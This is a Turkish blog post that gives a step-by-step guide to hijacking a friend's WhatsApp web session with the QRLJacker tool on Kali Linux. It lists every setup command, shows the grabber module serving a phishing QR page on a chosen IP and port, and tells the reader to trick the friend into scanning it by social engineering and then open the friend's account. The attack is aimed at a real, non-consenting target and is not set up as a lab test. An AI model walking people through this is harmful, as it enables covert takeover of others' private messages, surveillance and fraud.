İçeriğe geç
  • Anasayfa
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
  • Hacking
  • Malware
  • Exploits | Vulnerabilities
  • Araştırma | Analiz
  • Hakkımda
  • İletişim
  • Privacy Policy

Cyber Security Manager Blog

Siber Güvenlik ve Adli Bilişim Hakkında Kişisel Blok

Yayın tarihi Nisan 17, 2019

Arkadaşınızın WHATSAPP Hesabını Hackleyin 😊

Sosyal Mühendislik saldırıları son hızla çalışıyor.  Saldırganların çoğu hedefleri kandırmak için sosyal mühendislik yöntemlerini kullanmaktadır. Bugün sizlere Uygulama Web Oturumlarını elde etmede kullanılan QRLJacker’da sosyal mühendislik yöntemini anlatmaya çalışacağım. Aklınızda bulunsun bu program python ile yazılmış.
QRLJacker, Pentesting’in ilk aşamasında yardımcı olabilecek Whatsapp oturumu ele geçirme işleminde kullanılan en yaygın araçtır.

Bu araç nasıl çalışır?
-Tabiki kimlik avı prensibine göre çalışmaktadır. Yani; kullanıcıların kimlik bilgilerini toplamak için sahte giriş sayfalarının oluşturulduğu bir tür sosyal mühendislik saldırısı olarak nitelendirebiliriz.
Arkadaşlar ben test için VMware Workstation da kurulu Kali Linux 2019.4 amd64 kullanmış bulunmaktayım.

Bu arada Geeko sürücüsü; Mozilla tarafından geliştirilen ve uygulamalarda kullanılan Web tarayıcı motoru olarak görev yapmaktadır.
Selenium (bir python modülü) ve Mozilla tarayıcısı arasında bir bağlantı oluşturur.

Evet gelelim adımlarımıza; Kali’de Terminal açıp,
[email protected]:~/ cd Downloads  ile Downloads dizinine geçiyoruz, ardından sırasıyla aşagıdaki adımları gerçeleştiriyoruz.

[email protected]:~/Downloads# wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
[email protected]:~/Downloads# tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
[email protected]:~/Downloads# sudo mv -f geckodriver /usr/local/share/geckodriver
[email protected]:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
[email protected]:~/Downloads# sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

Eğer ki python3.7 yüklü değilse yüklüyoruz. Tabi ki bu arada firefox tarayıcısını güncellemeyi unutmayın. Bunun için;
[email protected]:~# sudo apt-get update & sudo apt-get install firefox-esr

Ardından; python3.7 ve pip paketini yüklüyoruz.

[email protected]:~# apt-get install python3.7

Sürümlerimizin güncel olduğundan emin olun;
[email protected]:~# sudo apt-get update
[email protected]:~# sudo apt-get -y upgrade

Yüklü olan Python3 sürümünü kontrol edelim,

[email protected]:~# python3 -V
Bende ki sürüm,
[email protected]:~# python3 3.7.3rc1

Python için yazılım paketlerini yönetmek için, pip’i yükleyelim,
[email protected]:~# sudo apt-get install -y python3-pip

Python paketlerini yazarakta yükleyebilirsin,
[email protected]:~# pip3 install package_name

Tabiki programlama ortamımız için sağlam bir kurulum yapmamızı sağlamak için kurulacak birkaç paket ve geliştirme aracıda mevcuttur,
[email protected]:~# sudo apt-get install build-essential libssl-dev libffi-dev python-dev

Python paketlerini yükledikten sonra işleme devam edelim,

[email protected]:~/Downloads# git clone https://github.com/OWASP/QRLJacking
[email protected]:~/Downloads# cd QRLJacking/QRLJacker/
[email protected]:~/QRLJacking/QRLJacker# ls
[email protected]:~/QRLJacking/QRLJacker# python3.7 -m pip install -r requirements.txt
[email protected]:~/QRLJacking/QRLJacker# python3.7 QrlJacker.py
QrlJacker > help
QrlJacker > list
QrlJacker > use grabber/whatsapp
QrlJacker Module(grabber/whatsapp) > options
QrlJacker Module(grabber/whatsapp) > set port 1337
QrlJacker Module(grabber/whatsapp) > set host 172.16.0.55
QrlJacker Module(grabber/whatsapp) > run
QrlJacker Module(grabber/whatsapp) >
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]

Qrljacker sunucusunu başladı, bu kısımdan sonra Sosyal Mühendislik yöntemleri ile IP yi arkadaşınıza bir şekilde ulaşmasını sağlıyoruz 🙂

//172.16.0.55:1337

Arkadaşınız Whatsapp QR kodunu tarattığında web otutumu açılmış olacaktır. Bizde sessions kontrol ediyoruz,

QrlJacker Module(grabber/whatsapp) > sessions
ve
ID Module name Capture on
0 Whatsapp Web-Apr-17-11:00:02-2019

QrlJacker Module(grabber/whatsapp) > sessions -i 0 dediğimizde firefox tarayıcımız açılıyor ve arkadaşınızın Whatsapp ‘ı ekranınızda 🙂 İyi Günler…

 

Kategoriler Hacking, Siber Saldırılar ve GüvenlikEtiketlerHack, hack whatsapp, hack whatsapp account of your friend, Kali Linux, Kali Linux 2019.4 amd64, python, QRLJacker, Siber güvenlik, VMware Workstation, WhatsApp

Yazı dolaşımı

Önceki Önceki yazı: BalKüpü (Honeypot) Nedir?
Sonraki Sıradaki Yazı: Siber Tehdit ve Siber Tehdit Çeşitleri

Menü

  • Anasayfa
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
  • Hacking
  • Malware
  • Exploits | Vulnerabilities
  • Araştırma | Analiz
  • Hakkımda
  • İletişim
  • Privacy Policy

Recent Posts

  • Cisco E-posta ve Web Yöneticisindeki Kritik Kusur
  • Zimbra E-posta Güvenlik Açığı
  • Kritik UNISOC Çip Güvenlik Açığı
  • Android Telefonlarda Lost.DIR Klasörü
  • Zyxel USG FLEX 100(W) Donanım Yazılımı Güvenlik Açığı

Recent Comments

Gösterilecek yorum yok.

Archives

  • Haziran 2022
  • Mayıs 2022
  • Temmuz 2021
  • Mayıs 2019
  • Nisan 2019
  • Mart 2019
  • Şubat 2019
  • Ocak 2019
  • Aralık 2018
  • Kasım 2018
  • Ekim 2018
  • Eylül 2018
  • Ağustos 2018
  • Temmuz 2018
  • Haziran 2018
  • Mayıs 2018
  • Nisan 2018
  • Mart 2018
  • Ocak 2018
  • Aralık 2017
  • Kasım 2017
  • Ekim 2017
  • Eylül 2017
  • Ağustos 2017
  • Temmuz 2017
  • Haziran 2017
  • Mayıs 2017
  • Nisan 2017
  • Mart 2017
  • Şubat 2017
  • Ocak 2017
  • Aralık 2016
  • Kasım 2016
  • Ekim 2016
  • Eylül 2016
  • Ağustos 2016
  • Temmuz 2016
  • Haziran 2016
  • Mayıs 2016
  • Nisan 2016
  • Mart 2016
  • Şubat 2016
  • Temmuz 2010

Categories

  • Araştırma | Analiz
  • Exploits | Vulnerabilities
  • Hacking
  • Malware
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
WordPress gururla sunar | Tema: WordPress.com tarafından Afterlight.